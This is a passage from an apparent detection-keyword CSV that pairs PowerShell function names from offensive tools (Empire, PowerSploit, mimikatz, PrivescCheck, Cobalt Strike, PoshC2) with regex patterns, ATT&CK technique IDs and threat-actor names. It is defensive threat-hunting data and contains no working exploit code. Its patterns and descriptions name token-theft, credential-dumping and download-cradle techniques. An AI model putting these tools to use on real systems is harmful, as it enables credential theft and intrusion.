"*Invoke-TheKatz*",".{0,1000}Invoke\-TheKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49754"
"*Invoke-ThirdPartyDriversCheck*",".{0,1000}Invoke\-ThirdPartyDriversCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49755"
"*Invoke-ThreadedFunction*",".{0,1000}Invoke\-ThreadedFunction.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","HTTP-Login.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49756"
"*Invoke-Thunderfox*",".{0,1000}Invoke\-Thunderfox.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49757"
"*Invoke-Thunderstruck*",".{0,1000}Invoke\-Thunderstruck.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49758"
"*Invoke-TmpDavFS*",".{0,1000}Invoke\-TmpDavFS.{0,1000}","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","N/A","2","138","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z","49759"
"*Invoke-TokenDuplication.ps1*",".{0,1000}Invoke\-TokenDuplication\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","49760"
"*Invoke-TokenManipulation -CreateProcess *cmd.exe*",".{0,1000}Invoke\-TokenManipulation\s\-CreateProcess\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49761"
"*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49762"
"*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49763"
"*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49764"
"*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49765"
"*Invoke-TokenManipulation.ps1*",".{0,1000}Invoke\-TokenManipulation\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49766"
"*Invoke-TokenManipulation.ps1*",".{0,1000}Invoke\-TokenManipulation\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49767"
"*Invoke-Tokenvator*",".{0,1000}Invoke\-Tokenvator.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49768"
"*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49769"
"*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49770"
"*Invoke-UdpEndpointsCheck*",".{0,1000}Invoke\-UdpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49771"
"*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49772"
"*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49773"
"*Invoke-UpdateMimikatzScript.ps1*",".{0,1000}Invoke\-UpdateMimikatzScript\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","N/A","10","1","62","14","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z","49774"
"*Invoke-UrbanBishop*",".{0,1000}Invoke\-UrbanBishop.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49775"
"*invoke-urlcheck -urls*",".{0,1000}invoke\-urlcheck\s\-urls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49776"
"*Invoke-URLFileClean -WritableShares * -URLAttackFileName*",".{0,1000}Invoke\-URLFileClean\s\-WritableShares\s.{0,1000}\s\-URLAttackFileName.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","49777"
"*Invoke-UserCheck*",".{0,1000}Invoke\-UserCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49778"
"*Invoke-UserEnumerationAsOutsider*",".{0,1000}Invoke\-UserEnumerationAsOutsider.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","49779"
"*Invoke-UserEnvCheck*",".{0,1000}Invoke\-UserEnvCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49780"
"*Invoke-UserGroupsCheck*",".{0,1000}Invoke\-UserGroupsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49781"
"*invokeuserhunter*",".{0,1000}invokeuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49783"
"*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49784"
"*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49785"
"*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49786"
"*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49787"
"*invoke-userhunter*",".{0,1000}invoke\-userhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","49788"
